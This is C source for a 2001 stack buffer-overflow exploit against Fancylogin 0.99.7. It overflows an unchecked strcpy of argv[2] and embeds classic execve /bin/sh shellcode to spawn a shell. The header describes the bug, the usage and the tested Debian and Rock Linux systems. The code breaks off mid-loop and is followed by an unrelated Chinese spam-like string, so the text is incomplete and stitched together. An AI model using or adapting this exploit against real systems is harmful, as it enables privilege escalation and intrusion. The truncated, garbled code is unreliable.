/*********************************************** * Fancylogin 0.99.7 bufferoverflow exploit * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * Exploited by gh0st * * There exists a very simple and stupid * bug in fancylogin, argv[2] is strcpy'd in * a to a small array without bounds check. * EIP can easily be overwritte, this is * standard exploit code... * Fancylogin is usually not +s so this * exploit isn't that dangerous ;) * * Thx to aleph one for his excellent article * about buffer overflows * * Greetings fly to: huega, koerk, chef, * anarchy, bullet * * This exploit was written during the * easterhegg 2001 @ CCC Hamburg * * usage: fancylogin_ex [buffer_size] [offset] * * Tested on debian potato and kernel 2.2.18 * and 2.2.19 using a self-compiled * fancylogin 0.99.7. * And on rocklinux 1.3.11 with a prebuilt * binary of fancylogin. * * The fancylogin team is aware of this bug * and has released a patch. * ***********************************************/ // Exploit worked for me using this offset #define OFFSET 3500 // and this buffersize ... #define BUFFER_SIZE 4100 #define EGG_SIZE 1200 // Standard linux shellcode by aleph one char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } int main(int argc, char *argv[]) { char *buff, *ptr, *egg; long *addr_ptr, addr; int offset=OFFSET, bsize=BUFFER_SIZE; int i, eggsize=EGG_SIZE; printf("[ Fancylogin 0.99.7 exploit ]\n[ exploited by gh0st @ easterhegg 2001 ]\n[ usage: %s [size] [offset] ]\n",argv[0]); if(argc>1) bsize=atoi(argv[1]); if(argc>2) offset=atoi(argv[2]); buff=malloc(bsize); egg=malloc(eggsize); addr=get_sp()-offset; printf("+ Using address: 0x%x\n", addr); ptr=buff; addr_ptr=(long *)ptr; for (i=0;i

亚洲欧美在线